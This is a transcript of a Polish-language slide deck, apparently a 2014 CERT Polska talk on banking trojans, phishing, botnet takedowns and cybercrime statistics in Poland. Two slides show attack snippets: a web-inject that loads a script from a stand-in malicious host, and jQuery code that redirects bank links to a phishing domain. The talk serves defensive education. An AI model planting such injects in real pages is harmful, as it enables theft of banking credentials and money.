Cyberprzestępczość w Polsce

Transcript

1. Cyberprzestępczość  w  Polsce     Piotr  Kijewski     @piotrkijewski

          17  listopada  2014  roku  

2. O  CZYM  (NIE)  BĘDĘ  MÓWIŁ  …  

3.      O  oszustwach  na  Allegro  

4.                O  atakach  DDoS

    

5.      O  wandaliźmie  Internetowym  

6. O  cyberszpiegostwie  i  APT   Uroburos/Turla/Snake,  Miniduke/ Cosmicduke,  Blackenergy  v3,

     Sandworm,  APT  28/Pawn  Storm/ Sofacy/Sednit,  Dragonfly  …  

7. O  czym  będę  mówił   •  O  wykorzystaniu  złośliwego  oprogramowania,

     botnetów,  phishingu  i  włamywaniu  się  w  celu   uzyskania  korzyści  finansowych   •  Trochę  o  pieniądzach   •  O  szeregu  “case  study”   •  O  tym,  jak  walczymy  ze  zjawiskiem     •  O  statystykach  

8. TROCHĘ  O  PIENIĄDZACH  

9. Trochę  o  pieniądzach   Porsche  Cayenne  S  Turbo:  149  000

    USD(ok.  450  000  złotych)  

10. I  więcej  pieniędzy   Porsche  911  Turbo:  149  000  USD

     (ok.  450  000  złotych)        

11. Kto  za  tym  stoi?   Paunch  (Dmitry   Fedotov?):  

    50  000  USD  miesięcznie   Porsche  Cayenne  S  Turbo:   Porsche  911  Turbo:   149  000  USD   (ok.  450  000   złotych)       Źródło:  krebsonsecurity.com,  cert-­‐gib  

12. Kto  za  tym  stoi?   Hamza  Bendelladj  (bx1):   10-­‐20

     mln  USD  za   transakcje  (?)   Źródło:  krebsonsecurity.com,  emirates.com    

13. Straty  wydają  się  być  olbrzymie*     <  WPISZ  TUTAJ

     DOWOLNĄ  LICZBĘ   $$$  PRZECZYTANĄ  W  MEDIACH  >       *  Ale  trudne  do  weryfikacji  

14. NO  ALE  PRZECIEŻ  NIE  W  POLSCE  …  

15. A  jednak  …   Źródło:  hvp://technologie.gazeta.pl/internet/ 1,104530,16885750,Gmina_padla_ofiara_cyberprzestepcow_i_stracila_prawie.html  

16. Blog  Macieja  Samcika              

    hvp://samcik.blox.pl/2014/   Źródło:  samcik.blox.pl/2014/02/Tak-­‐internetowi-­‐zlodzieje-­‐kradna-­‐nasze-­‐ pieniadze.html  

17. I  tak  dalej  …   Z  róznych  nagłówków  mediów:  

    1.  Pan  Marcin  stracił  140  000  złotych,   2.  Pani  Katarzyna  –  74  000  złotych,   3.  Pani  Anna  –  46  000  złotych,   4.  Pan  Robert  –  70  000  złotych,   5.  Pan  Waldemar  –  25  000  złotych,   6.  Pan  Piotr  –  27  000  złotych,   7.  Anonimowy  czytelnik  –  16  000  złotych,   8.  Anonimowy  przedsiebiorca  –  86  000  złotych.  

18. SŁÓW  KILKA  O  STARYM  DOBRYM   “KLASYCZNYM”  PHISHINGU  

19. None

20. Jaka  jest  skuteczność  phishingu?   •  Bank  X:   – 

     Aktywność  strony:  24/07/2014   –   Czas  aktywności:  od  11:12  do  18:57   –   Liczba  unikalnych  adresów  IP:  214   –   Potwierdzonych  kont:  214   •  Bank  Y:   –  Aktywność  strony:  29/05/2014   –  Czas  aktywności:  ok.  20h   –  Liczba  unikalnych  adresów  IP:  104       –  Liczba  zebranych  rekordów:    14789     •  Bank  Y:   –  Aktywność  strony:  29/05/2014   –  Czas  aktywności:  ok.  20h   –  Liczba  unikalnych  adresów  IP:  103   –  Liczba  zebranych  rekordów:    4501   •  Bank  Z:   –  Akywność  strony:  19/09/2014   –  Czas  aktywności:  ok.  3h   –  Liczba  unikalmych  adresów:  58   –  Liczba  zebranych  danych:  154  

21. Ignorowanie  ostrzeżeń  

22. Czy  połączyliśmy  się  z  tą  witryną,   którą  myślimy?  

       

23. TROJANY  BANKOWE:  JAK   WYGLĄDA  ATAK?  

24. “Człowiek  w  przeglądarce”  

25. Web-­‐inject   Target  URL  :  “*/nasz.internetowy.bank/*”   data_before    <head>

      data_a~er    <body>   data_inject    <script  type=“text/javascript”  src=hvps:// evilserver.example/grabmoney.js”>   </script>  

26. Automa€c  Transfer  System  

27. “Crimeware  as  a  service”  

28. “Crimeware  as  a  service”  

29. “Crimeware  as  a  service”  

30. “Omyłkowy  przelew”  

31. “Przelew  zdefiniowany”  

32. Słupy,  czyli  łatwa  praca  …   a
    kowicie C Legalna Firma

    Czy  dysponujesz  dwoma  wolnymi  godzinami  w   tygodniu?      Oto  jak  zarobic  185  EUR  w  tym  czasie  !!!   Stanowisko:  Asystent  Regionalnego  Menedzera  ds.  gotówki   Wymagania:   •  dostep  do  Internetu,   •  konto  bankowe,   •  niekaralnosć.  

33. CASE  STUDY  #1:  POWERZEUS  

34. None

35. PowerZeus/KINS   •  Zaczął  atakować  polskich  internautów  –  lipiec  2013

      •  Łączy  3  cechy:  webinjecty  (Zeus),  API  dla  pluginów  (SpyEye),   wstrzykiwanie  kodu  z  Power  Loader  (Alureon)   •  Architektura  oparta  o  moduły,  które  mogą  być  zaciągane  po   instalacji  w  systemie     •  Zawiera  moduł  zeus-­‐dll  (zaszyfrowany  na  dysku)   •  Ta  instancja  usiłowała  zainstalować  aplikację  poland.apk,   polska.apk,  e-­‐security.apk  na  Androida   –  używała  do  tego  polskich  domen  (shackowane  serwery)   •  Ta  instancja  używała  domen  .ru  na  potrzeby  C&C        

36. Polecenia  …  +  steganografia  J   •  get  info  

    –   #  i  numer  tel.  gdzieś  w  wiadomości     •  new  number   – /  i  numer  tel.  Gdzieś  w  wiadomości   •  fin   –   ,   •  uninstall   –   !     +34  668  …  

37. Hiszpański  łącznik  …   fonyou.es  –  numer  C&C  był  

    wirtualny    

38. „DNS  sinkholing”       ANALIZA   domenabotnetowa.pl   domenabotnetowa.pl

      PRZEJĘCIE  

39. Statystyki  sinkhole  unikalne  IP/day   Data:   12/11/2013  

40. CASE  STUDY  #2:  VIRUT  

41. Virut   •  Botnet  Virut,  zarządzany  z  Polski   • 

    Podstawowy  mechanizm  propagacji:  zarażanie   plików  wykonywalnych   •  Model  biznesowy:  wynajem  botnetu  innym   grupom  przestępczym,  „pay-­‐per-­‐install”   •  Działał  od  2006  roku    

42. Virut   •  Złośliwa  działalność:   –  kradzież  danych  dostępowych,

      –  ataki  DDoS  np.  na  serwis  ogłoszeń  nieruchomości   domiporta.pl  czy  internetowy  bank  e-­‐gold.com,   –  rozsyłanie  spamu,   –  czerpanie  korzyści  majątkowej,  z  wykorzystaniem   maszyn  ofiar,  np.  w  wyniku  otwierania  płatnych   reklam,   –  komputery  ofiar  są  łączone  w  mniejsze  podgrupy  i   odsprzedawane  czasowo  innym  grupom   przestępczym.  

43. Virut  w  statystykach  –  dane  Kaspersky   2012    

     

44. Virut  –  przejęcie  botnetu   •  Styczeń/luty  2013  NASK  we

     współpracy  z   wieloma  partnerami  przejął  kontrolę  na   wszystkimi  znanymi  domenami  Viruta   •  Przejęto  82  domeny  –  43  .pl,  30  .ru,  8  .at  i   1  .org   •  Ustanowiono  sinkhole:  sinkhole.cert.pl      

45. Virut  –  rozkład  geograficzny  infekcji   w  momencie  przejęcia  

46. Virut  w  sinkhole’u      

47. CASE  STUDY  #3:  DOMAIN  SILVER  

48. Domain  Silver,  Inc   •  Spółka  zarejestrowana  na  Seszelach,  aktywna

     od   czerwca  2012   •  Q4  2012:  wzrost  liczby  rejestrowanych  domen  za   pośrednictwem  tego  Rejestratora,  głównie  w   celach  C&C   •  Słaba  reakcja  na  zgłoszenia   –  Powolne  zawieszenie  domen,  tak  aby  dać  czas   botnetowi  na  przeskoczenie  na  inną  domenę  C&C   •  Pomimo  wielu  próśb,  złośliwe  rejestracje  trwały   nadal  

49. Domain  Silver,  Inc   •  Q1-­‐Q2  2013:  przejęcia  około  setki

     złośliwych   domen,  służących  do  C&C   •  Formalna  prośba  o  zaprzestanie  dalszych   złośliwych  rejestracji   •  Domain  Silver  twierdził,  że  się  dostosuje,  ale   złośliwe  rejestracje  trwały  nadal   •  30  lipca  2013:  NASK  wypowiada  umowę   Domain  Silver,  Inc.    

50. Domain  Silver,  Inc   •  Ogółem,  z  641  zarejestrowanych  domen

     w   dniu  9  lipca  2013,  wszystkie  aktywne  poza   jedną  (domainsilver.pl)  były  złośliwe   •  Zidentyfikowano  ponad  20  różnych  botnetów,   które  unicestwiono  bądź  zdestabilizowano   –   także  przypadki  tzw.  ransomware’u    

51. Usługi  „w  chmurze”      

52. Rozkład  geograficzny  botnetów  

53. CASE  STUDY  #4:  WŁAMANIA  DO   ROUTERÓW  DOMOWYCH  

54. Włamania  do  routerów  domowych      

55. Scenariusz  1  

56. Scenariusz  1   Poniższy  kod  doklejany  do  końca  HTML:  

    <script>   jQuery(document).ready(func€on()  {   jQuery('a[href*="ebgz.pl"]').avr('href','hvp://ssl-­‐.ebgz.pl/');   jQuery('li  p  a.buvon.green').avr('href','hvp://ssl-­‐.ebgz.pl/');   });   </script>  

57. Scenariusz  1  

58. Scenariusz  2  

59. GARŚĆ  STATYSTYK  DOT.  POLSKI  

60. Źródło  danych:  n6          30+  organizacji  z

     całego  świata   50+  feedów  danych  o  zagrożeniach   Dane  własne  CERT.PL     hap://n6.cert.pl  

61. Około  110  tysięcy  komputerów  w  Polsce   dziennie  ma  zainstalowanego

     jakiegoś  bota   (stare  i  nowe  infekcje)    

62. Około  19  tysięcy  komputerów  dziennie  w   Polsce  ma  zainstalowanych

     jakiegoś  trojana   bankowego  (stare  i  nowe  infekcje)  

63. Kampanie  phishingowe  2014  (banki)            

      17  

64. Kampanie  malware’owe  w  Polsce  w   2014  roku    

             10  

65. Domeny  C&C  przejęte  przez  nasz   zespół      

     >500    

66. PRZYSZŁOŚĆ?  

67. Źródło:  hvp://www.mbank.pl/aktualnosci/post,5928,mbank-­‐i-­‐zwiazek-­‐ bankow-­‐polskich-­‐ostrzegaja-­‐uwaga-­‐na-­‐nowego-­‐wirusa.html,  cert.pl   BANATRIX!  

68. Ransomware,  Cryptolocker  

69. Trendy  przyszłościowe   •  Ransomware   Źródło:  hvp://www.heraldnews.com/x2132756948/Swansea-­‐ police-­‐pay-­‐750-­‐ransom-­‐a~er-­‐computer-­‐virus-­‐strikes  

70. Malware  atakujący  mobilne  aplikacje   ssddd   Źródło:  hvp://securityintelligence.com/svpeng-­‐mobile-­‐malware-­‐ expanding-­‐to-­‐new-­‐territories/#.VGTBZlfF95k

     

71. Na  wynos:  „hackowanie  umysłu  …”   Źródło:  www.pocobor.com  

72.   Zgłoszenia  do  n6:  [email protected]     Kontakt:  [email protected],  [email protected]

      Twiver:  @piotrkijewski,  @cert_polska   Web:  www.cert.pl